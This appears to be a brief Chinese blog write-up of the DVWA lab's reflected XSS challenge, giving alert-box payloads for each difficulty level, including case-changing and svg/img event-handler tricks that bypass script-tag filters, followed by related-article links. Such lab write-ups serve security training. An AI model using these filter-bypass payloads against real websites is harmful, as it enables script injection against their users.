一、低级low
简单拿捏
<script>alert(123)</script>二、中级middle
源码过滤了script但是没有过滤大小写,改成大写S
<Script>alert(123)</script>三、高级high
比中级高,过滤了script并且以及大小写,使用其他标签,二选一就行
<svg onload=alert(123)>
<img src=x onerror=alert(123)>【dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦
假客套2024-11-06 13:19
相关推荐
枷锁—sha11 小时前
【SRC】SQL注入WAF 绕过应对策略(二)天荒地老笑话么18 小时前
静态 IP 规划:掩码/网关/DNS 的正确组合大方子2 天前
【PolarCTF】rce1枷锁—sha2 天前
Burp Suite 抓包全流程与 Xray 联动自动挖洞指南聚铭网络2 天前
聚铭网络再度入选2026年度扬州市网络和数据安全服务资源池单位darkb1rd2 天前
八、PHP SAPI与运行环境差异世界尽头与你2 天前
(修复方案)基础目录枚举漏洞枷锁—sha3 天前
【SRC】SQL注入快速判定与应对策略(一)liann1193 天前
3.1_网络——基础ESBK20253 天前
第四届移动互联网、云计算与信息安全国际会议(MICCIS 2026)二轮征稿启动,诚邀全球学者共赴学术盛宴